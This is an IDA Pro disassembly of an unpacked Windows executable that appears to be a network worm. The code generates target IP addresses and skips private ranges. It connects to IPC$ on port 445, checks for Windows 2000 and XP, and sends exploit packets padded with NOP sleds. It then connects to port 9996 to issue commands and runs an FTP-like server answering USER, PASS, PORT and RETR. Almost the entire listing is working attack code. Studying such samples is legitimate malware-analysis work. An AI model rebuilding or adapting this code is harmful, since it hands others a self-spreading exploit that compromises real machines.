;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5568131B790EB946F44F4CBDFE0BF153
; File Name : u:\work\5568131b790eb946f44f4cbdfe0bf153_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_401153:loc_401204�p
; sub_401EF5:loc_401F37�p ...
mov eax, dword_406F20
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F20, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: WinMain(x,x,x,x)+D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F20, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: WinMain(x,x,x,x)+1B�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405114
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_40510C
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_401153+D1�p
; sub_401EF5+17�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405104
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405110
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405108
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401A12+7B�p
Str = byte ptr -340h
var_114 = byte ptr -114h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 340h
push ebx
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 270Ch
call dword_4050EC
push [ebp+arg_0]
mov [ebp+var_12], ax
call sub_40129D
mov [ebp+var_10], eax
push 8 ; Size
lea eax, [ebp+var_C]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
push 2
call dword_4050F0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_4011B7
xor al, al
jmp loc_40129A
; ---------------------------------------------------------------------------
loc_4011B7: ; CODE XREF: sub_401153+5B�j
push esi
mov esi, dword_4050F4
push edi
lea eax, [ebp+var_4]
push 4
push eax
mov edi, 0FFFFh
push 1006h
push edi
push ebx
mov [ebp+var_4], 1388h
call esi ; dword_4050F4
lea eax, [ebp+var_4]
push 4
push eax
push 1005h
push edi
push ebx
call esi ; dword_4050F4
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4050F8
cmp eax, 0FFFFFFFFh
jnz short loc_401204
and byte ptr [ebp+arg_0+3], 0
jmp loc_40128E
; ---------------------------------------------------------------------------
loc_401204: ; CODE XREF: sub_401153+A6�j
call sub_401000
mov esi, eax
lea eax, [ebp+var_114]
push offset Source
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_114]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_114]
push esi
push eax
push off_406030
lea eax, [ebp+Str]
push eax
call dword_4050DC ; wsprintfA
lea eax, [ebp+Str]
xor esi, esi
push eax ; Str
call _strlen
add esp, 1Ch
test eax, eax
jbe short loc_40127F
loc_40125A: ; CODE XREF: sub_401153+12A�j
push 0
lea eax, [ebp+esi+Str]
push 1
push eax
push ebx
call dword_40511C
lea eax, [ebp+Str]
inc esi
push eax ; Str
call _strlen
cmp esi, eax
pop ecx
jb short loc_40125A
loc_40127F: ; CODE XREF: sub_401153+105�j
push 3E8h
call dword_40501C ; Sleep
mov byte ptr [ebp+arg_0+3], 1
loc_40128E: ; CODE XREF: sub_401153+AC�j
push ebx
call dword_405100
mov al, byte ptr [ebp+arg_0+3]
pop edi
pop esi
loc_40129A: ; CODE XREF: sub_401153+5F�j
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_40129D proc near ; CODE XREF: sub_401153+32�p
; sub_40152C+282�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4012BA
test esi, esi
jnz short loc_4012CC
cmp byte ptr [edi], 30h
jz short loc_4012D3
loc_4012BA: ; CODE XREF: sub_40129D+12�j
push edi
call dword_405110
test eax, eax
jz short loc_4012CC
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_4012CC: ; CODE XREF: sub_40129D+16�j
; sub_40129D+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_4012D3
xor esi, esi
loc_4012D3: ; CODE XREF: sub_40129D+1B�j
; sub_40129D+32�j
mov eax, esi
pop edi
pop esi
retn
sub_40129D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012D8 proc near ; CODE XREF: sub_401A12+15�p
var_748 = byte ptr -748h
var_718 = byte ptr -718h
Src = byte ptr -108h
var_107 = byte ptr -107h
var_B8 = byte ptr -0B8h
var_B5 = byte ptr -0B5h
var_8B = byte ptr -8Bh
var_89 = byte ptr -89h
var_88 = byte ptr -88h
Str = byte ptr -40h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
Dst = byte ptr -10h
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 748h
push offset Source
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050DC ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_107]
loc_40130C: ; CODE XREF: sub_4012D8+44�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_40130C
push ebx
push esi
push edi
push 60h ; Size
lea eax, [ebp+var_B8]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_88]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_89]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_B5]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_8B]
push eax ; Dst
call _memcpy
add esp, 2Ch
push [ebp+arg_0]
call dword_405110
mov esi, eax
test esi, esi
jz loc_4014E2
push 0
push 1
push 2
call dword_4050F0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4014E2
push 1BDh
mov [ebp+var_18], 2
call dword_4050EC
mov [ebp+var_16], ax
mov eax, [esi+0Ch]
push 8 ; Size
push 0 ; Val
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
mov esi, dword_4050F4
add esp, 0Ch
lea eax, [ebp+var_8]
mov edi, 0FFFFh
push 4
push eax
push 1006h
push edi
push ebx
mov [ebp+var_8], 3E8h
call esi ; dword_4050F4
lea eax, [ebp+var_8]
push 4
push eax
push 1005h
push edi
push ebx
call esi ; dword_4050F4
lea eax, [ebp+var_18]
push 10h
push eax
push ebx
call dword_4050F8
cmp eax, 0FFFFFFFFh
jz loc_4014E2
lea eax, [ebp+var_8]
push 4
push eax
push 1006h
push edi
push ebx
call esi ; dword_4050F4
lea eax, [ebp+var_8]
push 4
push eax
push 1005h
push edi
push ebx
call esi ; dword_4050F4
mov esi, dword_40511C
push 0
push 89h
push offset dword_4061CC
push ebx
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz short loc_4014E2
loc_401492: ; DATA XREF: .text:off_4065D8�o
mov edi, dword_4050E8
push 0
lea eax, [ebp+var_748]
push 640h
push eax
push ebx
call edi ; dword_4050E8
push 0
push 0A8h
push offset dword_406258
push ebx
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz short loc_4014E2
push 0
lea eax, [ebp+var_748]
push 640h
push eax
push ebx
call edi ; dword_4050E8
push 0
push 0DEh
push offset dword_406304
push ebx
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jnz short loc_4014E6
loc_4014E2: ; CODE XREF: sub_4012D8+F0�j
; sub_4012D8+107�j ...
xor eax, eax
jmp short loc_401527
; ---------------------------------------------------------------------------
loc_4014E6: ; CODE XREF: sub_4012D8+208�j
push 0
lea eax, [ebp+var_748]
push 640h
push eax
push ebx
call edi ; dword_4050E8
push 46h
lea esi, [ebp+var_718]
pop edi
loc_401500: ; CODE XREF: sub_4012D8+243�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050DC ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401500
push ebx
call dword_405100
push 1
pop eax
loc_401527: ; CODE XREF: sub_4012D8+20C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4012D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40152C proc near ; CODE XREF: sub_401A12+3B�p
; sub_401A12+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
Src = byte ptr -114h
var_113 = byte ptr -113h
Dst = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
Str = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call __alloca_probe
mov eax, dword_406A1C
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A20
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050DC ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_401566: ; CODE XREF: sub_40152C+4A�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_401566
push ebx
push esi
push edi
push 60h ; Size
lea eax, [ebp+Dst]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax ; Src
lea eax, [ebp+var_C1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax ; Src
lea eax, [ebp+var_97]
push eax ; Dst
call _memcpy
add esp, 2Ch
push 270Ch
call dword_4050EC
xor eax, 9999h
push 2 ; Size
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax ; Src
push offset dword_4060E4 ; Dst
call _memcpy
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_4016A8
cmp ebx, 2
jz short loc_4016A8
push 7D0h ; Size
lea eax, [ebp+var_F24]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E84]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_768]
push eax ; Dst
call _memcpy
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_40177C
; ---------------------------------------------------------------------------
loc_4016A8: ; CODE XREF: sub_40152C+115�j
; sub_40152C+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
imul ebx, 3Ch
push 4 ; Size
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_24C4]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_21A0]
push offset dword_406A14 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_219C]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_2190]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_401734: ; CODE XREF: sub_40152C+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_401734
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi ; Size
push 31h ; Val
push eax ; Dst
call _memset
push esi ; Size
lea eax, [ebp+var_68EC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
loc_40177C: ; CODE XREF: sub_40152C+177�j
push 0
push 1
push 2
call dword_4050F0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A0B
push 1BDh
mov [ebp+var_24], 2
call dword_4050EC
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_40129D
mov [ebp+var_20], eax
xor ebx, ebx
push 8 ; Size
lea eax, [ebp+var_1C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_4050F8
cmp eax, 0FFFFFFFFh
jz loc_401A0B
mov esi, dword_40511C
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_4050E8
call edi ; dword_4050E8
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
cmp [ebp+arg_4], 1
jz short loc_401949
cmp [ebp+arg_4], 2
jz short loc_401949
push 7Ch ; Size
lea eax, [ebp+var_1F08]
push offset dword_406558 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F24]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_1E8C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_16BC]
push offset off_4065D8 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_4019EC
; ---------------------------------------------------------------------------
loc_401949: ; CODE XREF: sub_40152C+3B8�j
; sub_40152C+3BE�j
push 68h ; Size
lea eax, [ebp+var_89C4]
push offset dword_40666C ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4814]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_895C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68EC]
push offset dword_4066D8 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3780]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_687C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DB8]
push offset dword_40674C ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz short loc_401A0B
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_4050E8
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_4019EC: ; CODE XREF: sub_40152C+418�j
push eax
push [ebp+var_4]
call esi ; dword_40511C
cmp eax, 0FFFFFFFFh
jz short loc_401A0B
push 3E8h
call dword_40501C ; Sleep
push [ebp+var_4]
call dword_405100
loc_401A0B: ; CODE XREF: sub_40152C+264�j
; sub_40152C+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40152C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A12 proc near ; CODE XREF: sub_401EF5+DF�p
Str = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+Str]
push eax
push esi
call sub_4012D8
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401A93
lea eax, [ebp+Str]
push offset SubStr ; "5.1"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401A56
push 0
push esi
call sub_40152C
push 0
jmp short loc_401A83
; ---------------------------------------------------------------------------
loc_401A56: ; CODE XREF: sub_401A12+36�j
lea eax, [ebp+Str]
push offset a5_0 ; "5.0"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401A79
push 1
push esi
call sub_40152C
push 1
jmp short loc_401A83
; ---------------------------------------------------------------------------
loc_401A79: ; CODE XREF: sub_401A12+59�j
push 2
push esi
call sub_40152C
push 2
loc_401A83: ; CODE XREF: sub_401A12+42�j
; sub_401A12+65�j
push esi
call sub_40152C
add esp, 10h
push esi
call sub_401153
pop ecx
loc_401A93: ; CODE XREF: sub_401A12+1F�j
pop esi
leave
retn
sub_401A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A96 proc near ; CODE XREF: sub_401B03+2B5�p
Str = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F24
push edi
push dword_406F24
lea eax, [ebp+Str]
push offset aI ; "%i"
push eax
call dword_4050DC ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin_log ; "c:\\win.log"
call dword_405028 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_401B00
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
mov esi, dword_405024
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call esi ; dword_405024
push [ebp+arg_0] ; Str
call _strlen
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; dword_405024
push edi
call dword_405020 ; _lclose
pop esi
loc_401B00: ; CODE XREF: sub_401A96+37�j
pop edi
leave
retn
sub_401A96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B03 proc near ; DATA XREF: sub_401E6A+74�o
var_8E4 = byte ptr -8E4h
Str = byte ptr -4E4h
Source = byte ptr -4E0h
Dest = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Delim = byte ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E2E
push esi
push edi
push 0
push off_4068D0 ; Str
call _strlen
mov esi, dword_40511C
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_40511C
mov edi, [ebp+arg_0]
jmp short loc_401B41
; ---------------------------------------------------------------------------
loc_401B3E: ; CODE XREF: sub_401B03+31A�j
mov ebx, [ebp+arg_0]
loc_401B41: ; CODE XREF: sub_401B03+39�j
push 0
lea eax, [ebp+Str]
push 400h
push eax
push ebx
call dword_4050E8
and [ebp+eax+Str], 0
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aUser ; "USER"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401B92
push 0
push off_4068D4 ; Str
call _strlen
pop ecx
push eax
push off_4068D4
jmp loc_401E16
; ---------------------------------------------------------------------------
loc_401B92: ; CODE XREF: sub_401B03+73�j
lea eax, [ebp+Str]
push offset aPass ; "PASS"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401BC3
push 0
push off_4068D8 ; Str
call _strlen
pop ecx
push eax
push off_4068D8
jmp loc_401E16
; ---------------------------------------------------------------------------
loc_401BC3: ; CODE XREF: sub_401B03+A4�j
lea eax, [ebp+Str]
push offset aPort ; "PORT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401C9F
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
mov ax, word_406A58
mov word ptr [ebp+Delim], ax
lea eax, [ebp+Delim]
push eax ; Delim
lea eax, [ebp+Dest]
push eax ; Str
call _strtok
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C12: ; CODE XREF: sub_401B03+159�j
test ebx, ebx
jz short loc_401C46
cmp edi, 4
jge short loc_401C29
push ebx
call sub_401E35
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C29: ; CODE XREF: sub_401B03+116�j
jnz short loc_401C35
push ebx
call sub_401E35
pop ecx
mov [ebp+var_18], eax
loc_401C35: ; CODE XREF: sub_401B03:loc_401C29�j
cmp edi, 5
jnz short loc_401C49
push ebx
call sub_401E35
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C49
; ---------------------------------------------------------------------------
loc_401C46: ; CODE XREF: sub_401B03+111�j
push 6
pop edi
loc_401C49: ; CODE XREF: sub_401B03+135�j
; sub_401B03+141�j
lea eax, [ebp+Delim]
push eax ; Delim
push 0 ; Str
call _strtok
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C12
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050DC ; wsprintfA
add esp, 18h
push 0
push off_4068E0 ; Str
call _strlen
pop ecx
push eax
push off_4068E0
jmp loc_401DDC
; ---------------------------------------------------------------------------
loc_401C9F: ; CODE XREF: sub_401B03+D5�j
lea eax, [ebp+Str]
push offset aRetr ; "RETR"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401DE1
push 0
push off_4068E4 ; Str
call _strlen
pop ecx
